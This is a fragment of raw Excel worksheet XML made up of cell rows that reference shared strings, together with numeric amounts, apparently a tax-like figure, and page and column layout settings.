    <row r="57" ht="15.75" spans="2:3">
      <c r="B57" s="234" t="s">
        <v>97</v>
      </c>
      <c r="C57" s="235" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="58" ht="15.75" spans="2:3">
      <c r="B58" s="234" t="s">
        <v>99</v>
      </c>
      <c r="C58" s="235" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="59" ht="15.75" spans="2:3">
      <c r="B59" s="234" t="s">
        <v>101</v>
      </c>
      <c r="C59" s="235" t="s">
        <v>102</v>
      </c>
    </row>
    <row r="60" ht="15.75" spans="2:3">
      <c r="B60" s="234" t="s">
        <v>103</v>
      </c>
      <c r="C60" s="235" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="61" ht="15.75" spans="2:3">
      <c r="B61" s="234" t="s">
        <v>105</v>
      </c>
      <c r="C61" s="235" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="62" ht="15.75" spans="2:3">
      <c r="B62" s="234" t="s">
        <v>107</v>
      </c>
      <c r="C62" s="235" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="63" spans="2:3">
      <c r="B63" s="234" t="s">
        <v>109</v>
      </c>
      <c r="C63" s="233" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="64" spans="2:3">
      <c r="B64" s="234" t="s">
        <v>111</v>
      </c>
      <c r="C64" s="233" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="65" spans="2:3">
      <c r="B65" s="234" t="s">
        <v>113</v>
      </c>
      <c r="C65" s="233" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="66" spans="2:3">
      <c r="B66" s="234" t="s">
        <v>115</v>
      </c>
      <c r="C66" s="233" t="s">
        <v>116</v>
      </c>
    </row>
    <row r="67" spans="2:3">
      <c r="B67" s="234" t="s">
        <v>117</v>
      </c>
      <c r="C67" s="233" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="68" ht="15.75" spans="2:3">
      <c r="B68" s="234" t="s">
        <v>118</v>
      </c>
      <c r="C68" s="235" t="s">
        <v>119</v>
      </c>
    </row>
    <row r="69" ht="15.75" spans="2:3">
      <c r="B69" s="234" t="s">
        <v>120</v>
      </c>
      <c r="C69" s="235" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="70" ht="15.75" spans="2:3">
      <c r="B70" s="234" t="s">
        <v>122</v>
      </c>
      <c r="C70" s="235" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="71" ht="15.75" spans="2:3">
      <c r="B71" s="234" t="s">
        <v>124</v>
      </c>
      <c r="C71" s="235" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="72" ht="15.75" spans="2:3">
      <c r="B72" s="234" t="s">
        <v>126</v>
      </c>
      <c r="C72" s="235" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="73" ht="15.75" spans="2:3">
      <c r="B73" s="234" t="s">
        <v>128</v>
      </c>
      <c r="C73" s="235" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="74" spans="2:3">
      <c r="B74" s="234" t="s">
        <v>130</v>
      </c>
      <c r="C74" s="233" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="75" ht="15.75" spans="2:3">
      <c r="B75" s="234" t="s">
        <v>132</v>
      </c>
      <c r="C75" s="235" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="76" ht="15.75" spans="2:3">
      <c r="B76" s="234" t="s">
        <v>134</v>
      </c>
      <c r="C76" s="235" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="77" spans="2:3">
      <c r="B77" s="234" t="s">
        <v>136</v>
      </c>
      <c r="C77" s="233" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="78" ht="15.75" spans="2:3">
      <c r="B78" s="234" t="s">
        <v>138</v>
      </c>
      <c r="C78" s="235" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="79" ht="15.75" spans="2:3">
      <c r="B79" s="234" t="s">
        <v>139</v>
      </c>
      <c r="C79" s="235" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="80" spans="2:3">
      <c r="B80" s="234" t="s">
        <v>140</v>
      </c>
      <c r="C80" s="233" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="81" ht="15.75" spans="2:3">
      <c r="B81" s="234" t="s">
        <v>142</v>
      </c>
      <c r="C81" s="235" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="82" spans="2:3">
      <c r="B82" s="234" t="s">
        <v>144</v>
      </c>
      <c r="C82" s="233" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="83" spans="2:2">
      <c r="B83" s="236" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="84" spans="2:2">
      <c r="B84" s="236" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="85" spans="2:2">
      <c r="B85" s="236" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="86" spans="2:2">
      <c r="B86" s="236" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="87" spans="2:2">
      <c r="B87" s="236" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="88" spans="2:2">
      <c r="B88" s="236" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="89" spans="2:2">
      <c r="B89" s="236" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="90" spans="2:2">
      <c r="B90" s="236" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="91" spans="2:2">
      <c r="B91" s="236" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="92" spans="2:2">
      <c r="B92" s="236" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="93" spans="2:2">
      <c r="B93" s="236" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="94" spans="2:2">
      <c r="B94" s="236" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="95" spans="2:2">
      <c r="B95" s="236" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="96" spans="2:2">
      <c r="B96" s="236" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="97" spans="2:2">
      <c r="B97" s="236" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="98" spans="2:2">
      <c r="B98" s="236" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="99" spans="2:2">
      <c r="B99" s="236" t="s">
        <v>162</v>
      </c>
    </row>
    <row r="100" spans="2:2">
      <c r="B100" s="236" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="101" spans="2:2">
      <c r="B101" s="236" t="s">
        <v>164</v>
      </c>
    </row>
    <row r="102" spans="2:2">
      <c r="B102" s="236" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="103" spans="2:2">
      <c r="B103" s="236" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="104" spans="2:2">
      <c r="B104" s="236" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="105" spans="2:2">
      <c r="B105" s="236" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="106" spans="2:2">
      <c r="B106" s="236" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="107" spans="2:2">
      <c r="B107" s="236" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="108" spans="2:2">
      <c r="B108" s="236" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="109" spans="2:2">
      <c r="B109" s="236" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="110" spans="2:2">
      <c r="B110" s="236" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="111" spans="2:2">
      <c r="B111" s="236" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="112" spans="2:2">
      <c r="B112" s="236" t="s">
        <v>175</v>
      </c>
    </row>
    <row r="113" spans="2:2">
      <c r="B113" s="236" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="114" spans="2:2">
      <c r="B114" s="236" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="115" spans="2:2">
      <c r="B115" s="236" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="116" spans="2:2">
      <c r="B116" s="236" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="117" spans="2:2">
      <c r="B117" s="236" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="118" spans="2:2">
      <c r="B118" s="236" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="119" spans="2:2">
      <c r="B119" s="236" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="120" spans="2:2">
      <c r="B120" s="236" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="121" spans="2:2">
      <c r="B121" s="236" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="122" spans="2:2">
      <c r="B122" s="236" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="123" spans="2:2">
      <c r="B123" s="236" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="124" spans="2:2">
      <c r="B124" s="236" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="125" spans="2:2">
      <c r="B125" s="236" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="126" spans="2:2">
      <c r="B126" s="236" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="127" spans="2:2">
      <c r="B127" s="236" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="128" spans="2:2">
      <c r="B128" s="236" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="129" spans="2:2">
      <c r="B129" s="236" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="130" spans="2:2">
      <c r="B130" s="236" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="131" spans="2:2">
      <c r="B131" s="236" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="132" spans="2:2">
      <c r="B132" s="236" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="133" spans="2:2">
      <c r="B133" s="236" t="s">
        <v>196</v>
      </c>
    </row>
    <row r="134" spans="2:2">
      <c r="B134" s="236" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="135" spans="2:2">
      <c r="B135" s="236" t="s">
        <v>198</v>
      </c>
    </row>
    <row r="136" spans="2:2">
      <c r="B136" s="236" t="s">
        <v>199</v>
      </c>
    </row>
    <row r="137" spans="2:2">
      <c r="B137" s="236" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="138" spans="2:2">
      <c r="B138" s="236" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="139" spans="2:2">
      <c r="B139" s="236" t="s">
        <v>202</v>
      </c>
    </row>
    <row r="140" spans="2:2">
      <c r="B140" s="236" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="141" spans="2:2">
      <c r="B141" s="236" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="142" spans="2:2">
      <c r="B142" s="236" t="s">
        <v>205</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="600" verticalDpi="600"/>
  <headerFooter alignWithMargins="0" scaleWithDoc="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B2:L2847"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="J8" sqref="J8:J2847"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="9" style="1"/>
    <col min="2" max="2" width="5.625" style="1" customWidth="1"/>
    <col min="3" max="3" width="12.5" style="2" customWidth="1"/>
    <col min="4" max="4" width="22.875" style="2" customWidth="1"/>
    <col min="5" max="5" width="19.5" style="2" customWidth="1"/>
    <col min="6" max="6" width="20.875" style="2" customWidth="1"/>
    <col min="7" max="7" width="5.625" style="1" customWidth="1"/>
    <col min="8" max="8" width="5.875" style="1" customWidth="1"/>
    <col min="9" max="9" width="12.875" style="1" customWidth="1"/>
    <col min="10" max="10" width="14.375" style="1" customWidth="1"/>
    <col min="11" max="11" width="9.75" style="1" customWidth="1"/>
    <col min="12" max="16384" width="9" style="1"/>
  </cols>
  <sheetData>
    <row r="2" ht="23.25" customHeight="1" spans="2:11">
      <c r="B2" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C2" s="3"/>
      <c r="D2" s="3"/>
      <c r="E2" s="3"/>
      <c r="F2" s="3"/>
      <c r="G2" s="3"/>
      <c r="H2" s="3"/>
      <c r="I2" s="3"/>
      <c r="J2" s="3"/>
      <c r="K2" s="3"/>
    </row>
    <row r="4" ht="18.75" spans="2:12">
      <c r="B4" s="4" t="s">
        <v>207</v>
      </c>
      <c r="C4" s="4"/>
      <c r="D4" s="5" t="s">
        <v>1361</v>
      </c>
      <c r="E4" s="5"/>
      <c r="F4" s="5"/>
      <c r="G4" s="5"/>
      <c r="H4" s="5"/>
      <c r="I4" s="5"/>
      <c r="J4" s="5"/>
      <c r="K4" s="5"/>
      <c r="L4" s="5"/>
    </row>
    <row r="6" spans="2:11">
      <c r="B6" s="6" t="s">
        <v>209</v>
      </c>
      <c r="C6" s="6" t="s">
        <v>4670</v>
      </c>
      <c r="D6" s="262" t="s">
        <v>4671</v>
      </c>
      <c r="E6" s="262" t="s">
        <v>4672</v>
      </c>
      <c r="F6" s="262" t="s">
        <v>4673</v>
      </c>
      <c r="G6" s="8" t="s">
        <v>214</v>
      </c>
      <c r="H6" s="6" t="s">
        <v>215</v>
      </c>
      <c r="I6" s="6" t="s">
        <v>217</v>
      </c>
      <c r="J6" s="12" t="s">
        <v>218</v>
      </c>
      <c r="K6" s="13" t="s">
        <v>2402</v>
      </c>
    </row>
    <row r="7" spans="2:11">
      <c r="B7" s="6"/>
      <c r="C7" s="6"/>
      <c r="D7" s="7"/>
      <c r="E7" s="7"/>
      <c r="F7" s="7"/>
      <c r="G7" s="8"/>
      <c r="H7" s="6"/>
      <c r="I7" s="6"/>
      <c r="J7" s="12"/>
      <c r="K7" s="13"/>
    </row>
    <row r="8" spans="2:11">
      <c r="B8" s="9">
        <v>1</v>
      </c>
      <c r="C8" s="238" t="s">
        <v>4674</v>
      </c>
      <c r="D8" s="9"/>
      <c r="E8" s="238" t="s">
        <v>4675</v>
      </c>
      <c r="F8" s="238" t="s">
        <v>4676</v>
      </c>
      <c r="G8" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H8" s="10">
        <v>1</v>
      </c>
      <c r="I8" s="14">
        <v>2863.25</v>
      </c>
      <c r="J8" s="15">
        <v>458.12</v>
      </c>
      <c r="K8" s="16"/>
    </row>
    <row r="9" spans="2:11">
      <c r="B9" s="9">
        <v>2</v>
      </c>
      <c r="C9" s="238" t="s">
        <v>4677</v>
      </c>
      <c r="D9" s="9"/>
      <c r="E9" s="238" t="s">
        <v>4678</v>
      </c>
      <c r="F9" s="238" t="s">
        <v>4679</v>
      </c>
      <c r="G9" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H9" s="10">
        <v>1</v>
      </c>
      <c r="I9" s="14">
        <v>10418.8</v>
      </c>
      <c r="J9" s="15">
        <v>1667.008</v>
      </c>
      <c r="K9" s="16"/>
    </row>
    <row r="10" spans="2:11">
      <c r="B10" s="9">
        <v>3</v>
      </c>
      <c r="C10" s="238" t="s">
        <v>4680</v>
      </c>
      <c r="D10" s="9"/>
      <c r="E10" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F10" s="238" t="s">
        <v>4682</v>
      </c>
      <c r="G10" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H10" s="10">
        <v>1</v>
      </c>
      <c r="I10" s="14">
        <v>128.21</v>
      </c>
      <c r="J10" s="15">
        <v>20.5136</v>
      </c>
      <c r="K10" s="16"/>
    </row>
    <row r="11" spans="2:11">
      <c r="B11" s="9">
        <v>4</v>
      </c>
      <c r="C11" s="238" t="s">
        <v>4683</v>
      </c>
      <c r="D11" s="238" t="s">
        <v>4684</v>
      </c>
      <c r="E11" s="238" t="s">
        <v>4685</v>
      </c>
      <c r="F11" s="238" t="s">
        <v>4686</v>
      </c>
      <c r="G11" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H11" s="10">
        <v>2</v>
      </c>
      <c r="I11" s="14">
        <v>307.69</v>
      </c>
      <c r="J11" s="15">
        <v>49.232</v>
      </c>
      <c r="K11" s="16"/>
    </row>
    <row r="12" spans="2:11">
      <c r="B12" s="9">
        <v>5</v>
      </c>
      <c r="C12" s="238" t="s">
        <v>4687</v>
      </c>
      <c r="D12" s="238" t="s">
        <v>4688</v>
      </c>
      <c r="E12" s="238" t="s">
        <v>4689</v>
      </c>
      <c r="F12" s="238" t="s">
        <v>4690</v>
      </c>
      <c r="G12" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H12" s="10">
        <v>2</v>
      </c>
      <c r="I12" s="14">
        <v>20.98</v>
      </c>
      <c r="J12" s="15">
        <v>3.3568</v>
      </c>
      <c r="K12" s="16"/>
    </row>
    <row r="13" spans="2:11">
      <c r="B13" s="9">
        <v>6</v>
      </c>
      <c r="C13" s="238" t="s">
        <v>4691</v>
      </c>
      <c r="D13" s="238" t="s">
        <v>4692</v>
      </c>
      <c r="E13" s="238" t="s">
        <v>4693</v>
      </c>
      <c r="F13" s="238" t="s">
        <v>4694</v>
      </c>
      <c r="G13" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H13" s="10">
        <v>150</v>
      </c>
      <c r="I13" s="14">
        <v>237.43</v>
      </c>
      <c r="J13" s="15">
        <v>37.92</v>
      </c>
      <c r="K13" s="16"/>
    </row>
    <row r="14" spans="2:11">
      <c r="B14" s="9">
        <v>7</v>
      </c>
      <c r="C14" s="238" t="s">
        <v>4695</v>
      </c>
      <c r="D14" s="238" t="s">
        <v>4696</v>
      </c>
      <c r="E14" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F14" s="238" t="s">
        <v>4697</v>
      </c>
      <c r="G14" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H14" s="10">
        <v>1</v>
      </c>
      <c r="I14" s="14">
        <v>358.97</v>
      </c>
      <c r="J14" s="15">
        <v>57.4352</v>
      </c>
      <c r="K14" s="16"/>
    </row>
    <row r="15" spans="2:11">
      <c r="B15" s="9">
        <v>8</v>
      </c>
      <c r="C15" s="238" t="s">
        <v>4698</v>
      </c>
      <c r="D15" s="238" t="s">
        <v>792</v>
      </c>
      <c r="E15" s="238" t="s">
        <v>4699</v>
      </c>
      <c r="F15" s="238" t="s">
        <v>4697</v>
      </c>
      <c r="G15" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H15" s="10">
        <v>3</v>
      </c>
      <c r="I15" s="14">
        <v>76.93</v>
      </c>
      <c r="J15" s="15">
        <v>12.3072</v>
      </c>
      <c r="K15" s="16"/>
    </row>
    <row r="16" spans="2:11">
      <c r="B16" s="9">
        <v>9</v>
      </c>
      <c r="C16" s="238" t="s">
        <v>4700</v>
      </c>
      <c r="D16" s="238" t="s">
        <v>4701</v>
      </c>
      <c r="E16" s="238" t="s">
        <v>4702</v>
      </c>
      <c r="F16" s="238" t="s">
        <v>4697</v>
      </c>
      <c r="G16" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H16" s="10">
        <v>3</v>
      </c>
      <c r="I16" s="14">
        <v>96.16</v>
      </c>
      <c r="J16" s="15">
        <v>15.384</v>
      </c>
      <c r="K16" s="16"/>
    </row>
    <row r="17" spans="2:11">
      <c r="B17" s="9">
        <v>10</v>
      </c>
      <c r="C17" s="238" t="s">
        <v>4703</v>
      </c>
      <c r="D17" s="238" t="s">
        <v>4704</v>
      </c>
      <c r="E17" s="238" t="s">
        <v>4705</v>
      </c>
      <c r="F17" s="238" t="s">
        <v>4706</v>
      </c>
      <c r="G17" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H17" s="10">
        <v>33</v>
      </c>
      <c r="I17" s="14">
        <v>372.31</v>
      </c>
      <c r="J17" s="15">
        <v>59.5584</v>
      </c>
      <c r="K17" s="16"/>
    </row>
    <row r="18" spans="2:11">
      <c r="B18" s="9">
        <v>11</v>
      </c>
      <c r="C18" s="238" t="s">
        <v>4707</v>
      </c>
      <c r="D18" s="9"/>
      <c r="E18" s="238" t="s">
        <v>4705</v>
      </c>
      <c r="F18" s="238" t="s">
        <v>4708</v>
      </c>
      <c r="G18" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H18" s="10">
        <v>2</v>
      </c>
      <c r="I18" s="14">
        <v>25.64</v>
      </c>
      <c r="J18" s="15">
        <v>4.1024</v>
      </c>
      <c r="K18" s="16"/>
    </row>
    <row r="19" spans="2:11">
      <c r="B19" s="9">
        <v>12</v>
      </c>
      <c r="C19" s="238" t="s">
        <v>4709</v>
      </c>
      <c r="D19" s="9"/>
      <c r="E19" s="238" t="s">
        <v>4705</v>
      </c>
      <c r="F19" s="238" t="s">
        <v>4710</v>
      </c>
      <c r="G19" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H19" s="10">
        <v>10</v>
      </c>
      <c r="I19" s="14">
        <v>17.09</v>
      </c>
      <c r="J19" s="15">
        <v>2.736</v>
      </c>
      <c r="K19" s="16"/>
    </row>
    <row r="20" spans="2:11">
      <c r="B20" s="9">
        <v>13</v>
      </c>
      <c r="C20" s="238" t="s">
        <v>4711</v>
      </c>
      <c r="D20" s="238" t="s">
        <v>4712</v>
      </c>
      <c r="E20" s="238" t="s">
        <v>4713</v>
      </c>
      <c r="F20" s="238" t="s">
        <v>4714</v>
      </c>
      <c r="G20" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H20" s="10">
        <v>130</v>
      </c>
      <c r="I20" s="14">
        <v>492.09</v>
      </c>
      <c r="J20" s="15">
        <v>78.832</v>
      </c>
      <c r="K20" s="16"/>
    </row>
    <row r="21" spans="2:11">
      <c r="B21" s="9">
        <v>14</v>
      </c>
      <c r="C21" s="238" t="s">
        <v>4715</v>
      </c>
      <c r="D21" s="9"/>
      <c r="E21" s="238" t="s">
        <v>4716</v>
      </c>
      <c r="F21" s="9"/>
      <c r="G21" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H21" s="10">
        <v>2</v>
      </c>
      <c r="I21" s="14">
        <v>13.67</v>
      </c>
      <c r="J21" s="15">
        <v>2.1888</v>
      </c>
      <c r="K21" s="16"/>
    </row>
    <row r="22" spans="2:11">
      <c r="B22" s="9">
        <v>15</v>
      </c>
      <c r="C22" s="238" t="s">
        <v>4717</v>
      </c>
      <c r="D22" s="238" t="s">
        <v>4718</v>
      </c>
      <c r="E22" s="238" t="s">
        <v>4719</v>
      </c>
      <c r="F22" s="9"/>
      <c r="G22" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H22" s="10">
        <v>18</v>
      </c>
      <c r="I22" s="14">
        <v>92.16</v>
      </c>
      <c r="J22" s="15">
        <v>14.7456</v>
      </c>
      <c r="K22" s="16"/>
    </row>
    <row r="23" spans="2:11">
      <c r="B23" s="9">
        <v>16</v>
      </c>
      <c r="C23" s="238" t="s">
        <v>4720</v>
      </c>
      <c r="D23" s="9"/>
      <c r="E23" s="238" t="s">
        <v>4721</v>
      </c>
      <c r="F23" s="238" t="s">
        <v>4722</v>
      </c>
      <c r="G23" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H23" s="10">
        <v>5</v>
      </c>
      <c r="I23" s="14">
        <v>42.73</v>
      </c>
      <c r="J23" s="15">
        <v>6.84</v>
      </c>
      <c r="K23" s="16"/>
    </row>
    <row r="24" spans="2:11">
      <c r="B24" s="9">
        <v>17</v>
      </c>
      <c r="C24" s="238" t="s">
        <v>4723</v>
      </c>
      <c r="D24" s="9"/>
      <c r="E24" s="238" t="s">
        <v>4724</v>
      </c>
      <c r="F24" s="238" t="s">
        <v>4725</v>
      </c>
      <c r="G24" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H24" s="10">
        <v>2</v>
      </c>
      <c r="I24" s="14">
        <v>1965.82</v>
      </c>
      <c r="J24" s="15">
        <v>314.5312</v>
      </c>
      <c r="K24" s="16"/>
    </row>
    <row r="25" spans="2:11">
      <c r="B25" s="9">
        <v>18</v>
      </c>
      <c r="C25" s="238" t="s">
        <v>4726</v>
      </c>
      <c r="D25" s="9"/>
      <c r="E25" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F25" s="238" t="s">
        <v>4722</v>
      </c>
      <c r="G25" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H25" s="10">
        <v>2</v>
      </c>
      <c r="I25" s="14">
        <v>2722.22</v>
      </c>
      <c r="J25" s="15">
        <v>435.5552</v>
      </c>
      <c r="K25" s="16"/>
    </row>
    <row r="26" spans="2:11">
      <c r="B26" s="9">
        <v>19</v>
      </c>
      <c r="C26" s="238" t="s">
        <v>4727</v>
      </c>
      <c r="D26" s="238" t="s">
        <v>4728</v>
      </c>
      <c r="E26" s="238" t="s">
        <v>4689</v>
      </c>
      <c r="F26" s="238" t="s">
        <v>4729</v>
      </c>
      <c r="G26" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H26" s="10">
        <v>1</v>
      </c>
      <c r="I26" s="14">
        <v>17.09</v>
      </c>
      <c r="J26" s="15">
        <v>2.7344</v>
      </c>
      <c r="K26" s="16"/>
    </row>
    <row r="27" spans="2:11">
      <c r="B27" s="9">
        <v>20</v>
      </c>
      <c r="C27" s="238" t="s">
        <v>4730</v>
      </c>
      <c r="D27" s="238" t="s">
        <v>4731</v>
      </c>
      <c r="E27" s="238" t="s">
        <v>4724</v>
      </c>
      <c r="F27" s="238" t="s">
        <v>4697</v>
      </c>
      <c r="G27" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H27" s="10">
        <v>4</v>
      </c>
      <c r="I27" s="14">
        <v>2393.16</v>
      </c>
      <c r="J27" s="15">
        <v>382.9056</v>
      </c>
      <c r="K27" s="16"/>
    </row>
    <row r="28" spans="2:11">
      <c r="B28" s="9">
        <v>21</v>
      </c>
      <c r="C28" s="238" t="s">
        <v>4732</v>
      </c>
      <c r="D28" s="9"/>
      <c r="E28" s="238" t="s">
        <v>4705</v>
      </c>
      <c r="F28" s="238" t="s">
        <v>4733</v>
      </c>
      <c r="G28" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H28" s="10">
        <v>58</v>
      </c>
      <c r="I28" s="14">
        <v>603.01</v>
      </c>
      <c r="J28" s="15">
        <v>96.512</v>
      </c>
      <c r="K28" s="16"/>
    </row>
    <row r="29" spans="2:11">
      <c r="B29" s="9">
        <v>22</v>
      </c>
      <c r="C29" s="238" t="s">
        <v>4734</v>
      </c>
      <c r="D29" s="9"/>
      <c r="E29" s="238" t="s">
        <v>4735</v>
      </c>
      <c r="F29" s="9"/>
      <c r="G29" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H29" s="10">
        <v>2</v>
      </c>
      <c r="I29" s="14">
        <v>735.04</v>
      </c>
      <c r="J29" s="15">
        <v>117.6064</v>
      </c>
      <c r="K29" s="16"/>
    </row>
    <row r="30" spans="2:11">
      <c r="B30" s="9">
        <v>23</v>
      </c>
      <c r="C30" s="238" t="s">
        <v>4736</v>
      </c>
      <c r="D30" s="238" t="s">
        <v>4737</v>
      </c>
      <c r="E30" s="238" t="s">
        <v>4738</v>
      </c>
      <c r="F30" s="238" t="s">
        <v>4739</v>
      </c>
      <c r="G30" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H30" s="10">
        <v>3</v>
      </c>
      <c r="I30" s="14">
        <v>492.44</v>
      </c>
      <c r="J30" s="15">
        <v>78.792</v>
      </c>
      <c r="K30" s="16"/>
    </row>
    <row r="31" spans="2:11">
      <c r="B31" s="9">
        <v>24</v>
      </c>
      <c r="C31" s="238" t="s">
        <v>4740</v>
      </c>
      <c r="D31" s="9"/>
      <c r="E31" s="238" t="s">
        <v>4741</v>
      </c>
      <c r="F31" s="238" t="s">
        <v>4739</v>
      </c>
      <c r="G31" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H31" s="10">
        <v>1</v>
      </c>
      <c r="I31" s="14">
        <v>1153.85</v>
      </c>
      <c r="J31" s="15">
        <v>184.616</v>
      </c>
      <c r="K31" s="16"/>
    </row>
    <row r="32" spans="2:11">
      <c r="B32" s="9">
        <v>25</v>
      </c>
      <c r="C32" s="238" t="s">
        <v>4742</v>
      </c>
      <c r="D32" s="238" t="s">
        <v>4743</v>
      </c>
      <c r="E32" s="238" t="s">
        <v>4744</v>
      </c>
      <c r="F32" s="238" t="s">
        <v>4739</v>
      </c>
      <c r="G32" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H32" s="10">
        <v>6</v>
      </c>
      <c r="I32" s="14">
        <v>1774.35</v>
      </c>
      <c r="J32" s="15">
        <v>283.9008</v>
      </c>
      <c r="K32" s="16"/>
    </row>
    <row r="33" spans="2:11">
      <c r="B33" s="9">
        <v>26</v>
      </c>
      <c r="C33" s="238" t="s">
        <v>4745</v>
      </c>
      <c r="D33" s="238" t="s">
        <v>4746</v>
      </c>
      <c r="E33" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F33" s="238" t="s">
        <v>4739</v>
      </c>
      <c r="G33" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H33" s="10">
        <v>9</v>
      </c>
      <c r="I33" s="14">
        <v>1001.63</v>
      </c>
      <c r="J33" s="15">
        <v>160.2576</v>
      </c>
      <c r="K33" s="16"/>
    </row>
    <row r="34" spans="2:11">
      <c r="B34" s="9">
        <v>27</v>
      </c>
      <c r="C34" s="238" t="s">
        <v>4748</v>
      </c>
      <c r="D34" s="238" t="s">
        <v>4749</v>
      </c>
      <c r="E34" s="238" t="s">
        <v>4750</v>
      </c>
      <c r="F34" s="238" t="s">
        <v>4739</v>
      </c>
      <c r="G34" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H34" s="10">
        <v>2</v>
      </c>
      <c r="I34" s="14">
        <v>38.95</v>
      </c>
      <c r="J34" s="15">
        <v>6.2336</v>
      </c>
      <c r="K34" s="16"/>
    </row>
    <row r="35" spans="2:11">
      <c r="B35" s="9">
        <v>28</v>
      </c>
      <c r="C35" s="238" t="s">
        <v>4751</v>
      </c>
      <c r="D35" s="238" t="s">
